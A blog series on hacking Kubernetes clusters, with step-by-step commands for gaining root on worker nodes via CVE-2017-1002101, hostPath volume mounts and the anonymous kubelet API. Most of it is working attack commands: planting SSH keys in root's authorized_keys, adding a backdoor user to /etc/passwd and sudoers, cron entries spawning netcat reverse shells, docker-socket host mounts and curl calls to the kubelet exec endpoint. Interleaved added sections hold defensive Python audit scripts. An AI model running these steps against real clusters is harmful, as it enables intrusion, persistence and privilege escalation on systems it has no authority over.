POC HACK (blog by Angelo)<br />
<br />
Hacking kubernetes part 3 - Five ways to get root access to the worker node method 2 using CVE-2017-1002101 (2018-05-18)<br />
Hi all, today I am going to demonstrate five ways to get root access to a worker node, not just from a hacked pod but also from your local machine (as long as you can access the kubernetes api :) )<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/7R4QtLmo85w" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
Before you read the rest of this post, please read these sites to get familiar with the problem:<br />
https://thenewstack.io/kubernetes-races-to-fix-regressions-introduced-by-recent-security-patches/<br />
https://github.com/kubernetes/kubernetes/issues/60813<br />
<br />
I am going to demonstrate the bug CVE-2017-1002101, accessing the subpath inside a mounted volume.<br />
<br />
There are five (or even more) ways to exploit this bug. The first one applies when your worker node is in read-only mode: depending on how locked down the node is, you can't get ssh root access to it, BUT you can read everything from it, which means you can access any mounted volume storage, which in turn means you have access to the docker socket, and that means root-level access :)<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''"
/tmp/kubectl exec -ti pod2 -- sh -c "cd /vol/root ; mkdir .ssh ; chmod 700 .ssh ; cd .ssh ; cat /tmp/hacker.key.pub >> authorized_keys ; chmod 600 authorized_keys"
worker_ip=$(/tmp/kubectl describe pod pod2 | grep Node: | awk {'print $2'} | cut -f2 -d/)
/tmp/kubectl exec -ti pod2 -- sh -c "ssh -o StrictHostKeyChecking=no -i /tmp/hacker.key root@$worker_ip"
</code>
</pre>
<br />
The second way applies when the / partition of the worker node is mounted read-write, which is usually the case; that means you can get root access to the worker node. I have seen nodes with some partitions RO and some RW, so I crafted an exploit for all the different situations and writable mount points. In this second attack I add a user by editing /etc/passwd and /etc/sudoers, and I set the home of this user on a RW partition like /tmp. Then I can copy my keys over and ssh into the host.<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''"
/tmp/kubectl exec -ti pod2 -- sh -c "echo -e 'hacker:$pass:2000:0:Hacker:/tmp/hacker:/bin/sh' >> /vol/etc/passwd"
/tmp/kubectl exec -ti pod2 -- sh -c "echo 'hacker ALL=(ALL) ALL' >> /vol/etc/sudoers"
/tmp/kubectl exec -ti pod2 -- sh -c "cd /vol/tmp ; mkdir hacker ; cd hacker ; mkdir .ssh ; chmod 700 .ssh ; cd .ssh ; cat /tmp/hacker.key.pub >> authorized_keys ; chmod 600 authorized_keys ; chown 2000:0 /vol/tmp/hacker -R"
worker_ip=$(/tmp/kubectl describe pod pod2 | grep Node: | awk {'print $2'} | cut -f2 -d/)
/tmp/kubectl exec -ti pod2 -- sh -c "ssh -o StrictHostKeyChecking=no -i /tmp/hacker.key hacker@$worker_ip"
</code>
</pre>
<br />
The third method also applies if /etc is RW: in case I can't ssh into the host for some security reason, I do the opposite and ask the node to connect back to me with a reverse shell, and the way I do this is by adding a cron entry under /etc/crontab.<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
pod_ip=$(/tmp/kubectl describe pod pod2 | grep -i IP | awk {'print $2'})
echo -e "Adding entry on crontab on /etc/crontab to do a reverse shell on..."
echo -e "Preparing your evil host to accept the connection..."
/tmp/kubectl exec -ti pod2 -- sh -c "echo '* * * * * root nc -c /bin/sh $pod_ip 6666' >> /vol/etc/crontab"
/tmp/kubectl exec -ti pod2 -- sh -c "nc -l -v -p 6666"
</code>
</pre>
<br />
The fourth method is for when /etc is RO as well, so I can't add a user or a cron entry there. I try to do the same thing by adding a cron for the root user (since I can write with root permissions) to /var/spool/cron/root; again it's the same idea, just a reverse shell back to my pod.<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
pod_ip=$(/tmp/kubectl describe pod pod2 | grep -i IP | awk {'print $2'})
echo -e "Adding entry on crontab on /var/spool/cron/root to do a reverse shell on..."
echo -e "Preparing your evil host to accept the connection..."
/tmp/kubectl exec -ti pod2 -- sh -c "echo '* * * * * nc -c /bin/sh $pod_ip 6666' >> /vol/var/spool/cron/root"
/tmp/kubectl exec -ti pod2 -- sh -c "nc -l -v -p 6666"
</code>
</pre>
<br />
The fifth method is to use the docker socket that lives under /var/run/docker.sock, so I can do things like:<br />
<pre style="font-family: Andale Mono, Lucida Console, Monaco, fixed, monospace; color: #000000; background-color: #eee;font-size: 12px;border: 1px dashed #999999;line-height: 14px;padding: 5px; overflow: auto; width: 100%">
<code>
/tmp/kubectl exec -ti pod2 -- sh -c "yum install -y -q docker-client"
docker -H unix:////vol/var/run/docker.sock run -i -v /:/tmp/host busybox ls -la /tmp/host/
</code>
</pre>
<br />
<br />
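Added example, not part of the original post: from the defender's side, the four filesystem-based methods above all leave traces in a handful of node files (root's authorized_keys, /etc/passwd, /etc/sudoers, /etc/crontab and /var/spool/cron/root). The Python script below checks sample contents of those files for exactly those traces: a non-root account with gid 0 or a home under /tmp, a sudoers rule for an unexpected principal, cron entries that hand a shell to netcat, and keys in root's authorized_keys outside an approved set. The file contents, the approved-key set and the pod IP 10.244.1.7 are all constructed for the example; on a real node you would feed it the actual files.<br />

```python
import re

# Constructed sample file contents standing in for the worker node's own files.
# They mirror the kinds of entries described above.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
hacker:$6$constructed$hash:2000:0:Hacker:/tmp/hacker:/bin/sh
"""
SAMPLE_SUDOERS = """Defaults    requiretty
root    ALL=(ALL) ALL
%wheel  ALL=(ALL) ALL
hacker ALL=(ALL) ALL
"""
SAMPLE_CRONTAB = """SHELL=/bin/bash
17 * * * * root cd / && run-parts --report /etc/cron.hourly
* * * * * root nc -c /bin/sh 10.244.1.7 6666
"""
SAMPLE_CRON_SPOOL = "* * * * * nc -c /bin/sh 10.244.1.7 6666\n"
APPROVED_ROOT_KEYS = {"ssh-ed25519 AAAAC3constructedapprovedkey ops@bastion"}
SAMPLE_ROOT_AUTHORIZED_KEYS = """ssh-ed25519 AAAAC3constructedapprovedkey ops@bastion
ssh-rsa AAAAB3constructedunknownkey root@pod2
"""

# A netcat invocation that hands a shell to a remote peer (-c or -e /bin/sh).
SHELL_NC_RE = re.compile(r"\b(nc|ncat|netcat)\b.*\s-[ce]\s+/bin/(ba)?sh\b")


def passwd_findings(text):
    """Flag non-root accounts with primary gid 0, and interactive accounts
    whose home directory lives under /tmp."""
    findings = []
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) != 7:
            continue
        name, _pw, uid, gid, _gecos, home, shell = fields
        if gid == "0" and name != "root":
            findings.append(f"passwd: {name} (uid {uid}) has primary gid 0")
        if home.startswith("/tmp") and not shell.endswith(("nologin", "false")):
            findings.append(f"passwd: {name} has an interactive shell with home {home}")
    return findings


def sudoers_findings(text, allowed=("root", "%wheel", "%sudo")):
    """Flag sudoers rules for any principal outside the expected set."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")):
            continue
        if line.split()[0] not in allowed:
            findings.append(f"sudoers: unexpected rule: {line}")
    return findings


def cron_findings(text, source):
    """Flag cron entries that spawn a shell for netcat, plus any other
    every-minute job (worth a look on a node that should run none)."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank line, comment or environment assignment
        if SHELL_NC_RE.search(line):
            findings.append(f"{source}: netcat shell entry: {line}")
        elif line.startswith("* * * * *"):
            findings.append(f"{source}: every-minute job: {line}")
    return findings


def authorized_keys_findings(text, approved):
    """Flag keys in root's authorized_keys that are not in the approved set."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#") and line not in approved:
            findings.append(f"authorized_keys: unapproved key: {line.split()[-1]}")
    return findings


def audit_node(passwd, sudoers, crontab, cron_spool, authorized_keys, approved_keys):
    """Run every check and return the combined list of findings."""
    return (passwd_findings(passwd)
            + sudoers_findings(sudoers)
            + cron_findings(crontab, "/etc/crontab")
            + cron_findings(cron_spool, "/var/spool/cron/root")
            + authorized_keys_findings(authorized_keys, approved_keys))


if __name__ == "__main__":
    for finding in audit_node(SAMPLE_PASSWD, SAMPLE_SUDOERS, SAMPLE_CRONTAB,
                              SAMPLE_CRON_SPOOL, SAMPLE_ROOT_AUTHORIZED_KEYS,
                              APPROVED_ROOT_KEYS):
        print(finding)
```

On the constructed input the audit reports six findings, one per artifact the methods above create. Comparing the live files against a known-good baseline (or a checksum of them) catches the same changes with less pattern matching; the point of the checks is that every one of the five methods has to touch node state that the node owner can watch.<br />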
I have written an exploit to make it easier to exploit all of these options, which I demonstrate in the video. My exploit also has a mode to poke around the file system.<br />
PS : If you have noticed, I didn't give much information on how to exploit this; that is because this was only fixed in version 1.10.<br />
<br />
Hacking kubernetes part 2 - Getting root access to the worker node method 1 (By misconfiguration) (2018-04-08)<br />
Hi everyone, in today's post I am going to explain how to ssh into the worker node where the pod is hosted. In order to do this you need to be able to complete part 1 of this tutorial; if you have not seen it yet, please do so before watching this one.<br />
Now that you are inside the hacked pod with an ssh connection, let's try to mount the root volume of the worker node where this pod is running. You should be able to do this as it's enabled by default; if the sysadmin didn't change it, you are good to go. You need the file below and the permission to launch pods from inside the hacked pod; again, if that pod is using the default service account you should be able to do it.<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/KP1nF1frI6I" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
File : deployment.yaml<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
---
kind: PersistentVolumeClaim
apiVersion: v1
metadata:
  name: task-pv-claim
spec:
  storageClassName: manual
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 1Gi
---
kind: PersistentVolume
apiVersion: v1
metadata:
  name: task-pv-volume
  labels:
    type: local
spec:
  storageClassName: manual
  capacity:
    storage: 1Gi
  accessModes:
    - ReadWriteOnce
  hostPath:
    path: "/root"
---
kind: Pod
apiVersion: v1
metadata:
  name: sshworker
spec:
  volumes:
    - name: task-pv-storage
      persistentVolumeClaim:
        claimName: task-pv-claim
  containers:
    - name: task-pv-container
      image: centos
      command: ["sleep"]
      args: ["66666"]
      volumeMounts:
        - mountPath: "/mnt/worker_node"
          name: task-pv-storage
</code></pre>
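Added example, not from the original post: deployment.yaml above only works because a PersistentVolume with hostPath /root is accepted at all. The Python check below is an admission-style audit over the three objects in that manifest, re-expressed as Python dicts so it needs no YAML library, plus one extra constructed Pod that mounts /var/run directly with a subPath and runs privileged, which is the shape of the docker-socket and subPath cases in part 3. The sensitive-path list and the severity labels are this example's own choices, not anything Kubernetes defines.<br />

```python
# Constructed dict versions of the objects in deployment.yaml above, plus one
# extra constructed Pod that reaches the node through a direct hostPath volume.
PVC = {"kind": "PersistentVolumeClaim", "metadata": {"name": "task-pv-claim"},
       "spec": {"storageClassName": "manual", "accessModes": ["ReadWriteOnce"]}}
PV = {"kind": "PersistentVolume", "metadata": {"name": "task-pv-volume"},
      "spec": {"storageClassName": "manual", "hostPath": {"path": "/root"}}}
POD = {"kind": "Pod", "metadata": {"name": "sshworker"},
       "spec": {"volumes": [{"name": "task-pv-storage",
                             "persistentVolumeClaim": {"claimName": "task-pv-claim"}}],
                "containers": [{"name": "task-pv-container", "image": "centos",
                                "volumeMounts": [{"mountPath": "/mnt/worker_node",
                                                  "name": "task-pv-storage"}]}]}}
DIRECT_POD = {"kind": "Pod", "metadata": {"name": "constructed-direct"},
              "spec": {"volumes": [{"name": "run", "hostPath": {"path": "/var/run"}}],
                       "containers": [{"name": "c", "image": "busybox",
                                       "securityContext": {"privileged": True},
                                       "volumeMounts": [{"name": "run", "mountPath": "/sock",
                                                         "subPath": "docker.sock"}]}]}}

# Node locations that hand out node-level control when mounted into a pod
# (this example's own list; extend it for your environment).
SENSITIVE_HOST_PATHS = ("/", "/root", "/etc", "/var/run", "/var/lib/kubelet", "/var/spool/cron")


def sensitive_host_path(path):
    """True when `path` is, or lies under, one of the sensitive locations."""
    norm = path.rstrip("/") or "/"
    return any(norm == p or (p != "/" and norm.startswith(p + "/"))
               for p in SENSITIVE_HOST_PATHS)


def audit_objects(objects):
    """Return (severity, message) findings for hostPath exposure, privileged
    containers and subPath mounts across a list of Kubernetes objects."""
    findings = []
    for obj in objects:
        kind = obj.get("kind")
        name = obj.get("metadata", {}).get("name", "<unnamed>")
        spec = obj.get("spec", {})
        if kind == "PersistentVolume" and "hostPath" in spec:
            path = spec["hostPath"]["path"]
            sev = "high" if sensitive_host_path(path) else "medium"
            findings.append((sev, f"PersistentVolume {name} exposes node path {path}"))
        elif kind == "Pod":
            for vol in spec.get("volumes", []):
                if "hostPath" in vol:
                    path = vol["hostPath"]["path"]
                    sev = "high" if sensitive_host_path(path) else "medium"
                    findings.append((sev, f"Pod {name} mounts node path {path} as volume {vol['name']}"))
                elif "persistentVolumeClaim" in vol:
                    claim = vol["persistentVolumeClaim"]["claimName"]
                    findings.append(("info", f"Pod {name} uses PVC {claim}; review the PV it binds to"))
            for c in spec.get("containers", []):
                if c.get("securityContext", {}).get("privileged"):
                    findings.append(("high", f"Pod {name} container {c['name']} is privileged"))
                for vm in c.get("volumeMounts", []):
                    if "subPath" in vm:
                        findings.append(("info", f"Pod {name} container {c['name']} uses subPath "
                                                 f"{vm['subPath']} (the CVE-2017-1002101 surface)"))
    return findings


def highest_severity(findings):
    """Collapse a findings list to the single worst severity, or 'none'."""
    order = {"info": 0, "medium": 1, "high": 2}
    return max((sev for sev, _ in findings), key=order.get, default="none")


if __name__ == "__main__":
    results = audit_objects([PVC, PV, POD, DIRECT_POD])
    for sev, msg in results:
        print(f"[{sev}] {msg}")
    print("worst:", highest_severity(results))
```

On the manifest above the PV is the high finding; the sshworker Pod itself looks harmless, which is why a check that only inspects pods misses this pattern and PV objects need the same review (or hostPath needs to be denied by policy for everyone but the cluster operator).<br />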
<br />
From inside the hacked pod, apply this config file<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl apply -f deployment.yaml
</code>
</pre>
<br />
Now open a bash session on the pod that you just created from inside the hacked pod :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl exec -ti sshworker /bin/bash
</code>
</pre>
<br />
If everything went ok, you should be able to see the contents of the /root folder of the worker node.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker /]# cd /mnt/worker_node/
[root@sshworker worker_node]# </code></pre>
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>[root@sshworker worker_node]# ls -la
total 8
drwxr-xr-x 3 root root 0 Apr 8 18:01 .
drwxr-xr-x 1 root root 4096 Apr 8 17:59 ..
-rw------- 1 root root 1737 Apr 8 17:56 .bash_history
drwx------ 2 root root 0 Apr 4 20:48 .ssh
-rw-r--r-- 1 root root 0 Apr 8 18:01 minikube_host</code></pre>
<br />
Now go back to the sshworker pod. You need to install a few packages to generate the ssh keys:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker worker_node]# yum install -y -q openssh-clients.x86_64 openssh.x86_64
warning: /var/cache/yum/x86_64/7/base/packages/fipscheck-lib-1.4.1-6.el7.x86_64.rpm: Header V3 RSA/SHA256 Signature, key ID f4a80eb5: NOKEY
Public key for fipscheck-lib-1.4.1-6.el7.x86_64.rpm is not installed
Public key for openssh-7.4p1-13.el7_4.x86_64.rpm is not installed
Importing GPG key 0xF4A80EB5:
Userid : "CentOS-7 Key (CentOS 7 Official Signing Key) &lt;security@centos.org&gt;"
Fingerprint: 6341 ab27 53d7 8a78 a7c2 7bb1 24c6 a8a7 f4a8 0eb5
Package : centos-release-7-4.1708.el7.centos.x86_64 (@CentOS)
From : /etc/pki/rpm-gpg/RPM-GPG-KEY-CentOS-7
[root@sshworker worker_node]#
</code></pre>
<br />
Now let's generate a ssh key with :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker /]# ssh-keygen -t rsa -b 4096 -f /tmp/hacker.key -q -N ''
[root@sshworker /]#
</code>
</pre>
<br />
Check if there is a .ssh folder under root; if there is, you don't have to do the following steps, but if you can't see one, then you do:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
ls -la .ssh   # if there is nothing there, then...
mkdir .ssh
chmod 700 .ssh
cd .ssh
</code>
</pre>
<br />
Now add your public key to the authorized_keys file:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
cat /tmp/hacker.key.pub >> authorized_keys
chmod 600 authorized_keys
</code>
</pre>
<br />
Now get the ip address of the host where your pod is running. Run this from the hacked pod where you have installed the kubectl command:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@hacked-6565c4954f-fnnvj /]# kubectl describe pod sshworker | grep Node:
Node: k8sdemo/192.168.99.100
</code>
</pre>
<br />
And now try to ssh into the host:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@sshworker .ssh]# ssh -i /tmp/hacker.key -o StrictHostKeyChecking=no root@192.168.99.100
(minikube ssh login banner)
# id
uid=0(root) gid=0(root) groups=0(root)
</code>
</pre>
<br />
<br />
And boom!!! You are on the worker node; now you can do this for all other worker nodes.<br />
<br />
Hacking kubernetes part 1 - Kubelet exec and reverse shell from pod (2018-04-01)<br />
Hello everyone, it's been a while since my last post, mainly because there was nothing interesting to post until now :) I will be posting a series of posts on how to hack kubernetes since this is a hot topic at the moment.<br />
<br />
By default the kubelet api allows anonymous access: no keys, no password, nothing is needed.<br />
<br />
<iframe width="720" height="350" src="https://www.youtube.com/embed/ivmn1Oay41g" frameborder="0" allow="autoplay; encrypted-media" allowfullscreen></iframe>
<br />
This is what you are going to need to reproduce this :<br />
<br />
1) Running kubernetes <=1.9; it has been fixed in version 1.10: <a href="https://github.com/kubernetes/kubernetes/pull/59666">https://github.com/kubernetes/kubernetes/pull/59666</a><br />
2) The kubelet api ports, 10250 and 10255, must be exposed to the internet or to your local network.<br />
3) rbac rules misconfigured or not even present.<br />
4) A cluster to test; I recommend installing minikube.<br />
5) You need to find a container that is not read only to install stuff, but even if it is read only you can still get a lot of info from it, like secrets and aws iam information.<br />
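Added example, not from the original post: requirements 2 and 3 above come down to the kubelet's own configuration. The Python check below evaluates a KubeletConfiguration expressed as a dict, using the kubelet.config.k8s.io/v1beta1 field names (authentication.anonymous.enabled, authentication.webhook.enabled, authentication.x509.clientCAFile, authorization.mode, readOnlyPort). WEAK reproduces the situation this post relies on and HARDENED is the corrected form; both dicts and the CA file path are constructed for the example. A setting that is absent is reported as unverified rather than assumed safe, because the effective default differs between the flag-based and file-based ways of configuring the kubelet.<br />

```python
# Constructed KubeletConfiguration documents (v1beta1 field names) as dicts.
WEAK = {
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True}, "webhook": {"enabled": False}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
    "port": 10250,
}
HARDENED = {
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": False},
                       "webhook": {"enabled": True},
                       "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"}},  # placeholder path
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
    "port": 10250,
}


def kubelet_findings(cfg):
    """Return the list of weaknesses in a KubeletConfiguration dict.
    Missing keys are treated as not hardened, so they show up as findings."""
    findings = []
    authn = cfg.get("authentication", {})
    authz = cfg.get("authorization", {})
    if authn.get("anonymous", {}).get("enabled", True):
        findings.append("anonymous requests are not explicitly disabled on the kubelet API port")
    has_webhook = authn.get("webhook", {}).get("enabled", False)
    has_client_ca = bool(authn.get("x509", {}).get("clientCAFile"))
    if not has_webhook and not has_client_ca:
        findings.append("no authenticated path configured (neither token webhook nor a client CA)")
    mode = authz.get("mode", "<unset>")
    if mode != "Webhook":
        findings.append(f"authorization mode {mode!r} does not delegate to the API server (RBAC)")
    ro_port = cfg.get("readOnlyPort", "<unset>")
    if ro_port != 0:
        findings.append(f"read-only port {ro_port} is not disabled; it serves pod listings without auth")
    return findings


if __name__ == "__main__":
    for label, cfg in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(label, kubelet_findings(cfg) or "ok")
```

With authorization mode Webhook the kubelet asks the API server whether the caller may perform the request, which is where requirement 3 (RBAC) comes in: a cluster with webhook authorization but an over-permissive role binding still lets that role hit the exec endpoint, so the two fixes belong together.<br />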
<br />
<br />
So, let's do this. I did this on minikube just to play and prove the concept; that's the easiest way to play with this vulnerability. So go ahead and install minikube, or you can run this on your cluster.<br />
Once you have minikube installed, you need its ip address; get it with<br />
<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ minikube ip
</code>
</pre>
<br />
Mine is 192.168.99.100; yours might be different. In order to run the curls below, you are going to need the pod name and the id.<br />
So let's launch 2 pods, one as the vulnerable host and the other one that will be waiting for our reverse shell.<br />
1) Launch the evil container that will be listening for our reverse shell.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ kubectl run evil --image=centos -it /bin/bash
</code>
</pre>
<br />
<br />
2) Launch the hacked container that we will use to hack into.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ kubectl run hacked --image=centos -it /bin/bash
</code>
</pre>
<br />
<br />
The pod name is "hacked" and the pod id you can get with :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ kubectl get pods
NAME READY STATUS RESTARTS AGE
hacked-65d6998b6c-rgl28 1/1 Running 1 48m
evil-7d7fff7d4c-5lmfz 1/1 Running 1 1
</code>
</pre>
<br />
<br />
So in my case, the pod name is "hacked" and the pod id is "hacked-65d6998b6c-rgl28".<br />
If you are wondering how you are going to get this information from outside, this is how:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl --insecure \
https://kube-node-here:10250/pods | jq
</code>
</pre>
<br />
<br />
In my case that would be 192.168.99.100 because that's my minikube ip; in a real-world scenario that would be the ip of the master node. This is how to get the pod names:<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].spec.containers[].name
"mongodb"
"external-evil-host"
"hacked"
"sidecar"
"dnsmasq"
"kubedns"
"kubernetes-dashboard"
"storage-provisioner"
"kube-addon-manager"
</code>
</pre>
<br />
<br />
And this is how to get the pod ids :
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl -s --insecure \
https://192.168.99.100:10250/runningpods/ | jq .items[].metadata.name
"mongodb-68cbf975f7-45kjh"
"external-evil-host-78d68f7789-2dmvw"
"hacked-6565c4954f-wdj4x"
"kube-dns-54cccfbdf8-dvtcm"
"kubernetes-dashboard-77d8b98585-mtpp9"
"storage-provisioner"
"kube-addon-manager-k8sdemo"
</code>
</pre>
From the commands above you can get the pod id and name.<br />
Now let's get into the interesting part.<br />
Open 3 tabs in your terminal: one with a shell on the hacked container, one on the evil container and another one where you are going to run lots of curl commands.<br />
The first thing you are going to do is create a file as a test. Run this on your localhost.<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=touch /hello_world"
</code>
</pre>
<br />
<br />
Now check your hacked container shell, and check if the file hello_world was created :<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ kubectl exec -ti hacked-65d6998b6c-rgl28 /bin/bash
[root@hacked-65d6998b6c-rgl28 /]#
[root@hacked-65d6998b6c-rgl28 /]# ls -la /hello_world
-rw-r--r-- 1 root root 0 Mar 22 16:22 /hello_world
</code>
</pre>
<br />
Alright, now that we know that all is well and working, let's install nc on that hacked box, so we can launch a reverse shell:<br />
1) Install nc in case it's not there yet.<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
angelo@poc-hack:~$ curl -sk \
https://192.168.99.100:10250/run/default/hacked-6565c4954f-wdj4x/hacked \
-d "cmd=yum install -y nc"
Loaded plugins: fastestmirror, ovl
Loading mirror speeds from cached hostfile
* base: mirror.freethought-internet.co.uk
* extras: mirrors.coreix.net
* updates: mirrors.coreix.net
Resolving Dependencies
--> Running transaction check
---> Package nmap-ncat.x86_64 2:6.40-7.el7 will be installed
--> Finished Dependency Resolution
Dependencies Resolved
========================================================================
Package Arch Version Repository Size
========================================================================
Installing:
nmap-ncat x86_64 2:6.40-7.el7 base 201 k
Transaction Summary
========================================================================
Install 1 Package
Total download size: 201 k
Installed size: 414 k
Downloading packages:
Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
Installing : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Verifying : 2:nmap-ncat-6.40-7.el7.x86_64 1/1
Installed:
nmap-ncat.x86_64 2:6.40-7.el7
Complete!
</code>
</pre>
2) Do the same for the evil container (execute this on your localhost):<br />
<br />
<pre style="background-color: #eeeeee; border: 1px dashed #999999; color: black; font-family: "andale mono" , "lucida console" , "monaco" , "fixed" , monospace; font-size: 12px; line-height: 14px; overflow: auto; padding: 5px; width: 100%;"><code>
[root@evil-ccb5dd4fc-tqf9s /]# yum install -y nc net-tools
Loaded plugins: fastestmirror, ovl
base | 3.6 kB 00:00:00
extras | 3.4 kB 00:00:00
updates | 3.4 kB 00:00:00
(1/4): extras/7/x86_64/primary_db | 185 kB 00:00:00
(2/4): base/7/x86_64/group_gz | 156 kB 00:00:02
(3/4): updates/7/x86_64/primary_db | 6.9 MB 00:00:09
